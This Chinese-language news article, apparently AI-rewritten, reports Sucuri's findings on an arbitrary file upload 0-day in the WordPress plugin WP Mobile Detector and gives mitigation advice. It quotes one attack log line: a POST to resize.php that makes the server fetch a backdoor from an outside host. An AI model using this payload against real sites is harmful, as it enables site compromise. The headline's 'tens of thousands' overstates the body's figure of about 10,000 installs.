Sucuri的安全团队发现,WP移动探测器这一广泛使用的插件存在漏洞,导致越来越多的WordPress网站成为黑客攻击的目标。更令人担忧的是,目前尚无修复补丁可供使用,这意味着该漏洞依然处于可被利用的状态。
根据Sucuri的分析,黑客主要通过这个插件中的漏洞来植入与色情内容相关的垃圾邮件脚本。
自该漏洞被曝光以来,WP移动探测器插件已被从WordPress官方插件目录中移除。
在Sucuri发布的一篇博客中提到:“我们的研究团队对这一问题进行了深入分析,发现所有受影响的WordPress网站都在使用WP移动探测器插件,而这个插件在5月31日被揭露出存在任意文件上传的0-day漏洞。尽管该插件已经下架,但目前仍没有相关的修复方案。”该博客还指出:“虽然漏洞是在5月31日被披露的,但根据我们的防火墙日志,自5月27日以来攻击活动便已开始。”
该插件的安装数量超过1万台活跃设备,而这些设备大多数仍然面临安全威胁。
该漏洞导致插件未能验证输入,从而使攻击者能够向服务器上传任意恶意的PHP代码。
据Sucuri报道:“利用这一漏洞极为简便,攻击者只需向resize.php或timthumb.php发送请求,便可在插件目录中植入后门程序的URL。”
以下是我们发现的一个攻击负载示例:
188.73.152.166 – – [31/May/2016:23:54:43 -0400] “POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php”
专家们指出,由于缺乏修复补丁,最佳的应对策略是立即卸载这个存在漏洞的WP移动探测器插件。
他们强烈建议用户删除该插件。如果必须使用,临时的解决方案是在wp移动目录或缓存目录中禁用PHP执行,例如在.htaccess文件中添加以下代码。”
deny from all
本文标题:数万网站因WordPress插件漏洞遭黑客攻击!
网址:https://www.2090ai.com/2025/11/22/plugins/67519.html
本站所有文章由wordpress极光ai post插件通过chatgpt写作修改后发布,并不代表本站的观点;如果无意间侵犯了你的权益,请联系我们进行删除处理。
如需转载,请务必注明文章来源和链接,谢谢您的支持与鼓励!
